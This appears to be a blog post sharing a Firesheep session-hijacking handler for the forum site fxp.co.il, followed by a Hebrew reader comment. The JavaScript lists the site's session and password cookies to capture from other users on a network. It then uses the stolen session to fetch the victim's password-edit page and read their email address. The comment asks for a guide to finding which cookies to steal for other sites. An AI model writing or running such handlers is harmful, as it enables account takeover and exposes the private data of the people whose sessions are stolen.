// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/
register({
name: "FXP.co.il",
domains: [ 'www.fxp.co.il' ],
sessionCookieNames: [ 'bblastvisit','bblastactivity','bbsessionhash','bbuserid','bbpassword','bbnginxcache' ],
identifyUser: function () {
var req = this.siteUrl + "/profile.php?do=editpassword";
var resp = this.httpGet(req);
this.userName = resp.body.querySelector("input[name='email']").value;
}
});
אם אתה יכול לעשות מדריך על איך אתה מוצא איזה קוקיז צריך לקחת בשביל להכין עוד כאלה קודים לאתרים אני ישמח :D
ReplyDeleteתודה